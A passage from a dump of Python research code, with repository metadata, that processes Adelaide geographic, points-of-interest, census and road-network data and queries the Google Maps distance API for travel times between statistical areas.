poi_df.to_pickle(\"../../data_process/poi_df_cleaned.pickle\")\n poi_df = pd.read_pickle(\"../../data_process/poi_df_cleaned.pickle\")\n poi_df = poi_df[poi_df[\"SA2_MAIN16\"]!=\"0\"]\n \n \n count = poi_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])\n split_count = poi_df.groupby([\"SA2_MAIN16\",\"type\"],as_index=False).aggregate([\"count\"])\n \n poi_df = pd.DataFrame()\n \n poi_df[\"SA2_MAIN16\"] = count.index.values\n poi_df[\"poi_count\"] = count[( 'geometry', 'count')].values\n \n entropy = {}\n for i, row in split_count.iterrows():\n sa_id, _type = i\n total_count = poi_df.loc[poi_df[\"SA2_MAIN16\"]==sa_id][\"poi_count\"]\n val = row[( 'geometry', 'count')]/total_count\n\n if sa_id not in entropy:\n entropy[sa_id] = (-val * np.log(val))\n else:\n entropy[sa_id] += (-val * np.log(val))\n \n entropy_list = []\n for sa_id in poi_df.SA2_MAIN16:\n entropy_list.append(float(entropy[sa_id]))\n \n poi_df[\"poi_count_entropy\"] = entropy_list\n \n node_degree_entropy_df = node_degree_df.merge(poi_df,how=\"left\",on=\"SA2_MAIN16\")\n \n sa_ids_poi = set(poi_df[\"SA2_MAIN16\"].values)\n \n edge_degree_df = edge_degree_df[edge_degree_df[\"sa2_code16_y\"].isin(sa_ids_poi)]\n edge_degree_df = edge_degree_df[edge_degree_df[\"sa2_code16_x\"].isin(sa_ids_poi)]\n \n count_dic = {key:val for key,val in zip(poi_df[\"SA2_MAIN16\"].values, poi_df[\"poi_count\"].values)}\n \n entropy_x = []\n poi_count_x = []\n notin = 0\n for sa_id in edge_degree_df[\"sa2_code16_x\"].values:\n if sa_id in entropy:\n entropy_x.append(float(entropy[sa_id]))\n poi_count_x.append(float(count_dic[sa_id]))\n else:\n notin += 1\n notin=0\n entropy_y = []\n poi_count_y = []\n for sa_id in edge_degree_df[\"sa2_code16_y\"]:\n if sa_id in entropy:\n entropy_y.append(float(entropy[sa_id]))\n poi_count_y.append(float(count_dic[sa_id]))\n else:\n notin += 1\n \n edge_degree_df[\"poi_entropy_x\"] = entropy_x\n edge_degree_df[\"poi_entropy_y\"] = entropy_y\n \n edge_degree_df[\"poi_count_x\"] = poi_count_x\n edge_degree_df[\"poi_count_y\"] = poi_count_y\n \n print(\"=====DONE union_poi=====\")\n \n return edge_degree_df, node_degree_entropy_df\n\ndef union_social(node_degree_poi_df, mount_path):\n \"\"\"\n Input:\n node_degree_poi_df - output from union_poi\n Output:\n A merged df with input and social economic info\n \"\"\"\n \n print(\"=====Running union_social=====\")\n \n age_df 
= pd.read_csv(mount_path + \"SA data/data_age.csv\")\n gender_educ_df = pd.read_csv(mount_path + \"SA data/data_gender_educ.csv\")\n \n \n age_df = age_df[[' sa2_main16','p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs',' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',' p_tot_55_64_yrs', ' p_tot_tot']]\n \n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs',' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',' p_tot_55_64_yrs']:\n age_df[col] = age_df[col] / age_df[\" p_tot_tot\"]\n \n gender_educ_df[\" gender_tot_tot\"] = gender_educ_df[\" m_tot_tot\"] + gender_educ_df[\" f_tot_tot\"]\n \n for col in ['m_tot_75_84_yr', ' m_adv_dip_dip_total', ' m_tot_35_44_yr',\n ' m_tot_55_64_yr', ' f_b_deg_tot', ' m_tot_85_yr_over',\n ' f_tot_55_64_yr', ' f_cer_tot_tot', ' f_tot_65_74_yr',\n ' f_tot_15_24_yr', ' m_grad_dip_cer_tot', \n ' f_tot_75_84_yr', ' f_tot_45_54_yr', ' m_tot_45_54_yr',\n ' f_adv_dip_dip_total', ' f_tot_35_44_yr', ' m_tot_25_34_yr',\n ' m_pg_deg_tot', ' m_tot_65_74_yr', ' m_tot_15_24_yr',\n ' f_pguate_deg_tot', ' m_b_deg_tot', ' m_cer_tot_tot',\n ' f_tot_25_34_yr', ' f_grad_dip_cer_tot', \n ' f_tot_85_yr_over']:\n g = col.split(\"_\")[0]\n if g in {\" m\", \"m\"}:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" m_tot_tot\"]\n else:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" f_tot_tot\"]\n \n gender_educ_df[\" m_percent\"] = gender_educ_df[\" m_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n gender_educ_df[\" f_percent\"] = gender_educ_df[\" f_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n age_gender_educ_df = age_df.merge(gender_educ_df, on=\" sa2_main16\", how=\"left\")\n helper = [str(elt) for elt in age_gender_educ_df[\" sa2_main16\"].values]\n \n age_gender_educ_df[\"SA2_MAIN16\"] = helper\n \n avg_med_age = []\n for idx, row in age_gender_educ_df.iterrows():\n avg = 0\n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs',\n ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',\n ' p_tot_55_64_yrs']:\n if col != \" p_tot_85ov\":\n temp = col.split(\"_\")\n x = int(temp[2])\n y = int(temp[3])\n med = (x+y)/2\n avg += (row[col]*med)\n else:\n avg += (row[col]*85)\n avg_med_age.append(avg)\n \n age_gender_educ_df[\" avg_med_age\"] = avg_med_age\n useful_df = age_gender_educ_df[[\"SA2_MAIN16\",\" m_percent\", \" f_percent\", \" avg_med_age\", \" p_tot_tot\"]]\n all_educ_df = pd.read_csv(mount_path + \"SA data/data_all_educ.csv\")\n \n degree_percentage = (all_educ_df[\" p_b_deg_tot\"] + all_educ_df[\" p_grad_dip_cer_tot\"])/all_educ_df[\" p_tot_tot\"]\n all_educ_df[\"degree_percentage\"] = degree_percentage\n all_educ_df[\"SA2_MAIN16\"] = [str(elt) for elt in all_educ_df[\" sa2_main16\"].values]\n \n useful_df = useful_df.merge(all_educ_df[[\"SA2_MAIN16\",\"degree_percentage\", \" p_cer_tot_tot\"]],how=\"left\", on=\"SA2_MAIN16\")\n useful_df.dropna()\n \n node_degree_poi_df = node_degree_poi_df.merge(useful_df, how=\"left\", on=\"SA2_MAIN16\")\n \n print(\"=====Done union_social=====\")\n \n return node_degree_poi_df\n\ndef get_final_node_edge_dfs(shp_file, road_file, mount_path):\n\n \"\"\"\n Converts shp_file (input) to the processed node_df and edge_df\n \"\"\"\n\n ## read files\n\n trans_mcc_df = pd.read_pickle(\"../../data_process/trans_mcc_df.pkl\")\n trans_age_df = pd.read_pickle(\"../../data_process/trans_age_df.pkl\")\n flow_df = 
pd.read_pickle(\"../../data_process/flow_df.pkl\")\n\n # read spatial files\n sa2_south_au = gpd.read_file(\"../../data_process/shapefiles/sa2_south_au.shp\")\n\n # read road networks\n road_file = gpd.read_file(\"../../data_process/shapefiles/sa2_roads.shp\")\n sa2_roads = process_road_shp(road_file)\n\n # read job and income data\n jobs_all = pd.read_pickle(\"../../data_process/jobs_all.pkl\")\n jobs_industries = pd.read_pickle(\"../../data_process/jobs_industries.pkl\")\n\n OD_full_path = shortest_path(shp_file)\n\n shp_proj, sa2_roads_proj = union_road_land_shp(shp_file, sa2_roads)\n \n degree_df = get_degree_df(shp_proj,sa2_roads_proj)\n\n edge_specific_df, node_specific_df = get_specific_df(OD_full_path, shp_file, shp_proj, mount_path)\n\n edge_degree_df, node_degree_df = union_degree(node_specific_df, edge_specific_df, degree_df, OD_full_path)\n\n edge_degree_poi_df, node_degree_poi_df = union_poi(node_degree_df, edge_degree_df)\n\n node_degree_poi_social_df = union_social(node_degree_poi_df, mount_path)\n\n return node_degree_poi_social_df, edge_degree_poi_df\n\nglobal trans_mcc_df\nglobal trans_age_df\nglobal flow_df\nglobal sa2_south_au\nglobal sa2_roads\nglobal jobs_all\nglobal jobs_industries\ntrans_mcc_df = pd.read_pickle(\"../../data_process/trans_mcc_df.pkl\")\ntrans_age_df = pd.read_pickle(\"../../data_process/trans_age_df.pkl\")\nflow_df = pd.read_pickle(\"../../data_process/flow_df.pkl\")\n\n# read spatial files\nsa2_south_au = gpd.read_file(\"../../data_process/shapefiles/sa2_south_au.shp\")\n\n\n# read job and income data\njobs_all = pd.read_pickle(\"../../data_process/jobs_all.pkl\")\njobs_industries = pd.read_pickle(\"../../data_process/jobs_industries.pkl\")\nif __name__ == \"__main__\":\n #TODO:\n if len(sys.argv) != 1:\n print(\"Invalid arugments\")\n pass\n else:\n shp_file = gpd.read_file(sys.argv[1])\n get_final_node_edge_dfs(shp_file)\n pass"
},
{
"alpha_fraction": 0.6332573890686035,
"alphanum_fraction": 0.6476841568946838,
"avg_line_length": 31.30327796936035,
"blob_id": "b023cd657bfd0ec8f989f18a896fa68346f655b3",
"content_id": "1657bd34d3b5816543a7594df69644ab8d083f23",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3951,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 122,
"path": "/src/d01_data/collect_travel_time.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# sw: script used to scrape travel time data from Google API.\n# No need to run the script for replication.\n# TBD: need to set up the global environment variables.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport geoplot\nfrom pysal.lib import weights\nimport networkx as nx\nfrom scipy.spatial import distance\nimport googlemaps\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# read files\nsa2_adelaide = gpd.read_file(intermediate_data_path + 'shapefiles/sa2_adelaide.shp')\n\nsa2_adelaide['centroids'] = sa2_adelaide.centroid\nsa2_adelaide['Lat'] = sa2_adelaide.centroids.y\nsa2_adelaide['Long'] = sa2_adelaide.centroids.x\n\n#\n# create a new dataframe\nOD = {}\nOD['o_idx'] = []\nOD['d_idx'] = []\nOD['o_sa2_idx'] = []\nOD['d_sa2_idx'] = []\nOD['o_lat'] = []\nOD['o_long'] = []\nOD['d_lat'] = []\nOD['d_long'] = []\n\nfor i in range(sa2_adelaide.shape[0]):\n print(\"Origin Index is: \", i)\n o_idx = i\n o_sa2_idx = sa2_adelaide.loc[i, 'SA2_MAIN16']\n o_lat = sa2_adelaide.loc[i, 'Lat']\n o_long = sa2_adelaide.loc[i, 'Long']\n\n for j in range(sa2_adelaide.shape[0]):\n d_idx = j\n d_sa2_idx = sa2_adelaide.loc[j, 'SA2_MAIN16']\n d_lat = sa2_adelaide.loc[j, 'Lat']\n d_long = sa2_adelaide.loc[j, 'Long']\n\n # append\n OD['o_idx'].append(o_idx)\n OD['d_idx'].append(d_idx)\n OD['o_sa2_idx'].append(o_sa2_idx)\n OD['d_sa2_idx'].append(d_sa2_idx)\n OD['o_lat'].append(o_lat)\n OD['o_long'].append(o_long)\n OD['d_lat'].append(d_lat)\n OD['d_long'].append(d_long)\n\n# create the data frame\nOD_df = pd.DataFrame(OD)\n\n# Need to specify your API_key\ngmaps = googlemaps.Client(key=API_key)\n\nOD_time_dic = {}\n\nfor idx in range(OD_df.shape[0]):\n # scraping codes - Google does not allow it.\n if idx%100 == 0:\n print(idx)\n o_lat,o_long,d_lat,d_long = OD_df.loc[idx, ['o_lat','o_long','d_lat','d_long']]\n origin = (o_lat,o_long)\n destination = (d_lat,d_long)\n result = gmaps.distance_matrix(origin, destination, mode = 'driving')\n OD_time_dic[idx] = result\n\n# Augment Google data\nOD_from_google_api = {}\nOD_from_google_api['idx'] = [] # Important for combining two dfs\nOD_from_google_api['d_address'] = []\nOD_from_google_api['o_address'] = []\nOD_from_google_api['od_duration_text'] = []\nOD_from_google_api['od_duration_value'] = []\nOD_from_google_api['od_distance_text'] = []\nOD_from_google_api['od_distance_value'] = []\n\nfor key in OD_time_dic.keys():\n if key%100 == 0:\n print(key)\n OD_from_google_api['idx'].append(key)\n OD_from_google_api['d_address'].append(OD_time_dic[key]['destination_addresses'][0])\n OD_from_google_api['o_address'].append(OD_time_dic[key]['origin_addresses'][0])\n OD_from_google_api['od_duration_text'].append(OD_time_dic[key]['rows'][0]['elements'][0]['duration']['text'])\n OD_from_google_api['od_duration_value'].append(OD_time_dic[key]['rows'][0]['elements'][0]['duration']['value'])\n OD_from_google_api['od_distance_text'].append(OD_time_dic[key]['rows'][0]['elements'][0]['distance']['text'])\n OD_from_google_api['od_distance_value'].append(OD_time_dic[key]['rows'][0]['elements'][0]['distance']['value'])\n\nOD_from_google_api_df = pd.DataFrame(OD_from_google_api)\n\n# merge\nOD_merged_google_api = OD_df.merge(OD_from_google_api_df, 
left_index=True, right_index=True)\nOD_merged_google_api\n\n# save\nimport pickle\n\nwith open(\"../data/OD_Google_API_raw.pickle\", 'wb') as w:\n pickle.dump(OD_time_dic, w, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open(\"../data/OD_Google_API_With_Map_Info.pickle\", 'wb') as w:\n pickle.dump(OD_merged_google_api, w, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6350315809249878,
"alphanum_fraction": 0.6444414854049683,
"avg_line_length": 43.2023811340332,
"blob_id": "5ea09d906ece4b77b0daa7232aacd94b93315751",
"content_id": "e01da3d52f6a63d5da4f28d4b9cd256029a814ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7439,
"license_type": "permissive",
"max_line_length": 163,
"num_lines": 168,
"path": "/src/d02_intermediate/preprocess_2_POIs.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# processing POI data\n# inputs: raw POI\n# outputs: node df with POIs' counts, entropy, etc.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia/\"\n\n# read poi\npoi_df = gpd.read_file(raw_data_path + \"points/points.shp\")\nsa2_adelaide = gpd.read_file(intermediate_data_path + 'shapefiles/sa2_adelaide.shp')\n\n# print(poi_df.shape)\n# print(poi_df.columns)\n\n#region 1. Assign POIs to SA2 (15 min)\n# assign POIs to sa2 in Adelaide\nsa_codes_poi = []\nfor i, centroid in enumerate(poi_df.geometry):\n if i % 1000 == 0: print(i)\n found = False\n for j, row in sa2_adelaide.iterrows():\n if row[\"geometry\"].contains(centroid):\n sa_codes_poi.append(row[\"SA2_MAIN16\"])\n found = True\n break\n if not found:\n sa_codes_poi.append(\"0\")\n\npoi_df[\"SA2_MAIN16\"] = sa_codes_poi\npoi_df = poi_df.loc[poi_df[\"SA2_MAIN16\"]!='0', :]\nprint(poi_df.shape)\n\n# new mapping.\ndrop_list = ['Historical_House',\n 'adit','alpine_hut','animal_boarding','antenna','apartment','beacon','bench','bicycle_parking',\n 'buffer_stop','building','bus_station','bus_stop',\n 'chalet', 'charging_station', 'chimney', 'clock',\n 'communications_t','compressed_air','construction','crossing',\n 'device_charging_','disused','dojo', 'drinking_water',\n 'elevator',\n 'flagpole','fuel','funeral_home',\n 'garbage_can','give_way','goods_conveyor','guest_house;hote','grave_yard','guest_house','guest_house;hote',\n 'halt',\n 'kiln',\n 'lamp','level_crossing','loading_dock',\n 'manhole', 'mast', 'milestone', 'mine', 'mine_shaft', 'motorway_junctio',\n 'parking', 'parking_entrance', 'parking_space', 'proposed',\n 'rest_area',\n 'sanitary_dump_st', 'silo', 'speed_camera','station','steps','stop','street_cabinet',\n 'street_lamp','subway_entrance','surveillance','survey_point','swings','switch',\n 'tank','taxi','tomb','tower',\n 'traffic_signals','traffic_signals;','trailhead','tram_level_cross','tram_stop','tree','turning_circle','turning_loop','turntable',\n 'waste_basket','waste_transfer_s','wastewater_plant','water_point','water_tank','water_tap',\n 'water_tower','water_well','windmill','windpump','wreck',\n 'yes']\neducation = ['childcare', 'college', 'community_centre', 'kindergarten', 'music_school', 'school', 'university']\ntour = ['attraction', 'castle', 'ferry_terminal', 'monument',\n 'picnic_site', 'place_of_worship', 'viewpoint', 'zoo']\nrestaurant = ['bar', 'bbq', 'cafe', 'fast_food', 'food_court', 'ice_cream', 'pub', 'restaurant', 'restaurant;bar']\nculture = ['arts_centre', 'artwork', 'gallery', 'library', 'memorial', 'museum',\n 'piano', 'public_bookcase', 'ruins', 'shower', 'studio', 'theatre']\nrecreation = ['camp_pitch', 'camp_site', 'caravan_site', 'cinema', 'events_venue',\n 'fountain', 'nightclub', 'stripclub', 'swimming_pool']\nsmall_business = ['bicycle_rental', 'bicycle_repair_s', 'brothel', 'car_rental', 'car_wash', 'gambling', 'makerspace','marketplace',\n 'vending_machine','veterinary','winery']\nhotel = ['hostel', 'hotel', 
'motel']\ninformation = ['information', 'monitoring_stati', 'newsagency', 'telephone']\ngovernment = ['bureau_de_change', 'courthouse', 'fire_station', 'police', 'post_box', 'post_office', 'prison', 'pumping_station',\n 'recycling', 'scout_hall', 'scrapyard', 'shelter', 'shelter;drinking', 'social_facility', 'storage_tank',\n 'toilets','townhall']\nmedical = ['clinic', 'dentist', 'doctors', 'first_aid', 'hospital', 'pharmacy', 'surgery']\nfinance = ['atm', 'bank']\n\n# replacement dictionary\nreplacement_dict = dict(zip(drop_list+education+tour+restaurant+culture+recreation+small_business+hotel+information+government+medical+finance,\n ['drop']*len(drop_list)+['education']*len(education)+['tour']*len(tour)+['restaurant']*len(restaurant)+['culture']*len(culture)+\\\n ['recreation']*len(recreation)+['small_business']*len(small_business)+['hotel']*len(hotel)+['information']*len(information)+\\\n ['government']*len(government)+['medical']*len(medical)+['finance']*len(finance)))\n#\nnew_type = poi_df['type'].replace(to_replace = replacement_dict)\npoi_df['type_agg'] = new_type # new category of POIs\n\npoi_df.to_pickle(intermediate_data_path+\"POI_with_SA2_idx.pickle\")\n#endregion\n\n\n\n\n#region 2. Create aggregate counts and entropy for SA2.\n# output columns:\n# poi_count, poi_entropy, poi_count_per_area, poi_entropy_per_area,\n# poi_count_agg, poi_entropy_agg, poi_count_agg_per_area, poi_entropy_agg_per_area\nwith open(intermediate_data_path+\"POI_with_SA2_idx.pickle\", 'rb') as f:\n poi_df = pickle.load(f)\nsa2_adelaide = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# remove the type_agg == drop\npoi_agg_df = poi_df.loc[poi_df['type_agg'] != 'drop', :]\n\n# create counts\ncount = poi_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])[('geometry', 'count')]\ncount_agg = poi_agg_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])[('geometry', 'count')] # miss one obs\n\n# create entropy\ndef return_entropy(poi, count):\n '''\n return: entropy df\n '''\n\n split_count = poi.groupby([\"SA2_MAIN16\",\"type\"],as_index=False).aggregate([\"count\"])\n entropy = {}\n for i, row in split_count.iterrows():\n sa_id, _type = i\n total_count = count.loc[sa_id]\n val = row[('geometry', 'count')] / total_count\n\n if sa_id not in entropy:\n entropy[sa_id] = (-val * np.log(val))\n else:\n entropy[sa_id] += (-val * np.log(val))\n\n entropy_df = pd.Series(entropy.values(), index=entropy.keys())\n return entropy_df\n\n# compute two entropy values\nentropy_df = return_entropy(poi_df, count)\nentropy_agg_df = return_entropy(poi_agg_df, count_agg)\n\n#\ncount.name = 'poi_count'\ncount_agg.name = 'poi_count_agg'\nentropy_df.name = 'poi_entropy'\nentropy_agg_df.name = 'poi_entropy_agg'\n\n#\nsa2_adelaide_merge=pd.merge(sa2_adelaide, count.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(count_agg.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(entropy_df.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(entropy_agg_df.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\n\n# nan and zeros exist.\nprint(\"Number of nan is: \", np.sum(sa2_adelaide_merge.isna()))\nprint(\"Number of zeros is: \", np.sum(sa2_adelaide_merge == 0))\n\n# save the
data\nsa2_adelaide_merge.to_pickle(intermediate_data_path+'sa2_node_with_POI_counts_entropy.pickle')\n\n#endregion\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6835096478462219,
"alphanum_fraction": 0.709199070930481,
"avg_line_length": 41.44578170776367,
"blob_id": "695947a0063fa740fdb1bad469c33e62c5b4503e",
"content_id": "7d834cfff5b05fd625f3827a226c2e6d6c4affc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10588,
"license_type": "permissive",
"max_line_length": 173,
"num_lines": 249,
"path": "/src/d02_intermediate/preprocess_0_shapefiles.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# processing the SA2 and road shapefiles\n# inputs: raw SA2 and road shapefiles\n# Outputs: Adelaide SA2 nodal and link dataframes with transport information\n# Outputs are pickles:\n# sa2_node_with_only_transport_attributes.pickle\n# sa2_edge_with_only_transport_attributes.pickle\n# Processing files saved:\n# sa2_adelaide.shp, sa2_adelaide_edge.shp, OD_full_path.pickle, sa2_roads_in_adelaide.shp, etc.\n# util needed: shortest path dictionary; a function turning the road networks to the link dataframe.\n# time: ~15 min\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nfrom pysal.lib import weights\nimport networkx as nx\nimport momepy\nimport pickle\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# # read files\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n\n#region 1. Extact the SA2s for Adelaide area.\n# raw data\nsa2_shape = gpd.read_file(raw_data_path + \"sa2/SA2_2016_AUST.shp\")\n\n# Keep Adelaide area\n# info from: file:///Users/shenhaowang/Downloads/StatePublicHealthPlan_Final.pdf (page 32)\nadelaide_sa4_set = ['401','402','403','404']\nsa2_adelaide = sa2_shape.loc[sa2_shape.SA4_CODE16.isin(adelaide_sa4_set)]\nprint(\"Shape of SA2 in the Adelaide area is: \", sa2_adelaide.shape)\n\n# only use the most relevant variables.\nsa2_adelaide = sa2_adelaide[['SA2_MAIN16', 'SA2_NAME16', 'geometry']]\n\n# projection\nsa2_adelaide.crs = 'epsg:3112'\nprint(sa2_adelaide.crs)\n\n# create a sa2_adelaide link dataframe\nindex = pd.MultiIndex.from_product([sa2_adelaide['SA2_MAIN16'], sa2_adelaide['SA2_MAIN16']], names=['O', 'D'])\nsa2_adelaide_link_df = pd.DataFrame(index=index).reset_index()\n\n# add the geometry part to sa2_adelaide_link_df\nfrom shapely.geometry import LineString\nedge_list = []\nfor idx in range(sa2_adelaide_link_df.shape[0]):\n origin = sa2_adelaide_link_df.loc[idx, 'O']\n destination = sa2_adelaide_link_df.loc[idx, 'D']\n edge = LineString([sa2_adelaide.loc[sa2_adelaide['SA2_MAIN16'] == origin, 'geometry'].centroid.values[0],\n sa2_adelaide.loc[sa2_adelaide['SA2_MAIN16'] == destination, 'geometry'].centroid.values[0]])\n edge_list.append(edge)\n\nsa2_adelaide_link_df['geometry'] = edge_list\n\n# create the gpd object\nsa2_adelaide_link = gpd.GeoDataFrame(sa2_adelaide_link_df, crs='epsg:3112')\n\n# save the process SA2 Adelaide shapefile\nsa2_adelaide.to_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\nsa2_adelaide_link.to_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n#endregion\n\n\n\n#region 2. 
Create the OD shortest path dictionary for SA2 Adelaide shapefile.\nsa2_adelaide=gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# create the queen contiguity network\nadelaide_queen=weights.contiguity.Queen.from_dataframe(sa2_adelaide)\n\n# create the kernel network (using Euclidean distances)\nsa2_adelaide_kernel = weights.distance.Kernel.from_dataframe(sa2_adelaide, k=109)\n\n# turn the defaults to euclidean distances as weights.\nfor i in sa2_adelaide_kernel.neighbors.keys():\n for j_idx in range(len(sa2_adelaide_kernel.neighbors[i])):\n j = sa2_adelaide_kernel.neighbors[i][j_idx]\n # note that kw.weights indices are\n # i (node index), j_idx (index of the node on the list - not node index!)\n weight = sa2_adelaide_kernel.weights[i][j_idx]\n distance = (1 - weight) * sa2_adelaide_kernel.bandwidth[i]\n sa2_adelaide_kernel.weights[i][j_idx] = distance[0]\n\n# assign euclidean weights to Queen net\nfor o in adelaide_queen.neighbors.keys():\n# print(o)\n for d_idx in range(len(adelaide_queen.neighbors[o])):\n d = adelaide_queen.neighbors[o][d_idx] # return the o and d SA2 original indices.\n weight = sa2_adelaide_kernel[o][d] # get the kernel weight associated with the o and d.\n adelaide_queen.weights[o][d_idx] = weight\n\n# print(adelaide_queen.weights)\n\n# create the nx object\nadelaide_nx = adelaide_queen.to_networkx()\n# assign weights to adelaide_nx\nfor o,d in adelaide_nx.edges:\n adelaide_nx.edges[o,d]['weight'] = adelaide_queen[o][d]\n\n# create the OD dictionary for the full shortest paths.\npath=dict(nx.all_pairs_dijkstra(adelaide_nx, weight='weight'))\n\n# create a OD dictionary.\nOD_full_path = {}\n\nfor o in range(110):\n for d in range(110):\n if d == 103 or o == 103: # note that 103 is the island - this is no path to it.\n pass\n else:\n OD_full_path[(o,d)] = path[o][1][d]\n\n# note: OD_full_path idx is the same as sa2_adelaide!\nwith open(intermediate_data_path+'OD_full_path.pickle', 'wb') as f:\n pickle.dump(OD_full_path, f)\n#endregion\n\n\n\n#region 3. Read road shapefiles and save them\nsa2_roads = gpd.read_file(raw_data_path + \"roads/Roads_GDA2020.shp\")\nsa2_roads = sa2_roads.loc[~sa2_roads['class'].isna(),]\n\n# projection to epsg:3112\nsa2_roads.crs = 'epsg:3112'\n\n# combine freeway and highway as one category (HWY).\nsa2_roads.loc[sa2_roads['class'] == 'FREE', 'class'] = 'HWY'\n\n# extract three types of roads for GIS visualization\nsa2_roads_LOCL = sa2_roads.loc[sa2_roads['class'] == 'LOCL', :]\nsa2_roads_HWY = sa2_roads.loc[sa2_roads['class'] == 'HWY', :]\nsa2_roads_UND = sa2_roads.loc[sa2_roads['class'] == 'UND', :]\n\n# np.unique(sa2_roads['class'], return_counts = True)\n\n\n# save shapefiles\nsa2_roads.to_file(intermediate_data_path+\"shapefiles/sa2_roads.shp\")\nsa2_roads_LOCL.to_file(intermediate_data_path+\"shapefiles/sa2_roads_LOCL.shp\")\nsa2_roads_HWY.to_file(intermediate_data_path+\"shapefiles/sa2_roads_HWY.shp\")\nsa2_roads_UND.to_file(intermediate_data_path+\"shapefiles/sa2_roads_UND.shp\")\n\n#endregion\n\n\n\n\n#region 4. 
Turn road shapefiles to node attributes of SA2s' nodes.\n# attributes: number of road counts and intersection counts.\n# inputs: roads and sa2 shapefiles\n# outputs: sa2 shapefile with road attributes.\nsa2_roads = gpd.read_file(intermediate_data_path+\"shapefiles/sa2_roads.shp\")\nsa2_adelaide = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# augment road class info to sa2_adelaide\nsa2_adelaide_road_attributes, roads_in_adelaide = util.compute_road_attributes(sa2_adelaide, sa2_roads)\nsa2_adelaide_road_attributes['num_roads'] = np.sum(sa2_adelaide_road_attributes[['class_ART', 'class_BUS', 'class_COLL',\n 'class_HWY', 'class_LOCL','class_SUBA', 'class_TRK2',\n 'class_TRK4', 'class_UND']], axis = 1)\n\n# augment intersection attributes to sa2_adelaide\nsa2_adelaide_intersection_attributes = util.compute_intersection_attributes(sa2_adelaide_road_attributes, roads_in_adelaide)\n\n# merge sa2_adelaide, sa2_adelaide_road_attributes, and sa2_adelaide_intersection_attributes\nsa2_adelaide_with_transport_attributes = sa2_adelaide.merge(sa2_adelaide_road_attributes, on='SA2_MAIN16', how='outer', suffixes=(\"\",\"_x\"))\nsa2_adelaide_with_transport_attributes.drop(columns=['SA2_NAME16_x', 'geometry_x'], inplace=True)\nsa2_adelaide_with_transport_attributes = sa2_adelaide_with_transport_attributes.merge(sa2_adelaide_intersection_attributes, on='SA2_MAIN16', how='outer', suffixes=(\"\",\"_x\"))\n\n# save sa2_adelaide_with_transport_attributes and 